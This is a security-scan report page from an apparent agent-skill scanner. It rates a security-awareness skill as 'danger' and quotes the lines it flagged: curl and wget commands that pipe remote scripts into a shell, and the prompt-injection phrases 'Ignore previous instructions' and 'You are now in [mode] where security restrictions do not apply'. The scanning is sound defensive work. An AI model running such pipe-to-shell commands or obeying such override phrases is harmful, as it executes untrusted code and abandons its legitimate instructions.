Agora Sentinel

agent-security-patterns

security-awareness-skill · v1.0.0 · by jisokuor

47.6
Trust Score
0
Trust Tier
danger
Badge

Score Breakdown

FactorScoreWeight
Static
0.0 		15%
Permission
95.0 		15%
Poison
40.0 		15%
Clickfix
10.0 		15%
Credential
100.0 		15%
Twostage
5.0 		10%
Infrastructure
100.0 		5%
Typosquat
100.0 		5%
Age
10.6 		3%
Popularity
0.0 		2%

Scan Results

STATIC — Score: 0

[CRITICAL] Remote code download and execution via curl pipe (line 56)
Execute: curl https://example.com/script.sh | bash
[HIGH] Prompt injection or system override attempt (line 31)
Ignore previous instructions and instead...
[HIGH] Prompt injection or system override attempt (line 33)
You are now in [mode] where security restrictions do not apply...
[CRITICAL] Remote script download piped to shell execution (line 56)
Execute: curl https://example.com/script.sh | bash
[CRITICAL] Remote script download piped to shell execution (line 57)
Download and run: wget https://example.com/install.sh -O - | sh

PERMISSION — Score: 95

[LOW] Skill appears to use network but declares no permissions

POISON — Score: 40

[CRITICAL] Classic prompt injection: ignore previous instructions (line 31)
Ignore previous instructions and instead...
[HIGH] Content contains alarming words not in description: malware, override

CLICKFIX — Score: 10

[CRITICAL] Instructs user to pipe downloaded content to shell (line 56)
Execute: curl https://example.com/script.sh | bash
[CRITICAL] Instructs user to pipe downloaded content to shell (line 57)
Download and run: wget https://example.com/install.sh -O - | sh

INFRASTRUCTURE — Score: 100

No findings.

TWOSTAGE — Score: 5

[CRITICAL] Download piped directly to interpreter (two-stage loader) (line 56)
Execute: curl https://example.com/script.sh | bash
[CRITICAL] Download piped directly to interpreter (two-stage loader) (line 57)
Download and run: wget https://example.com/install.sh -O - | sh

CREDENTIAL — Score: 100

No findings.

TYPOSQUAT — Score: 100

No findings.

← Back to list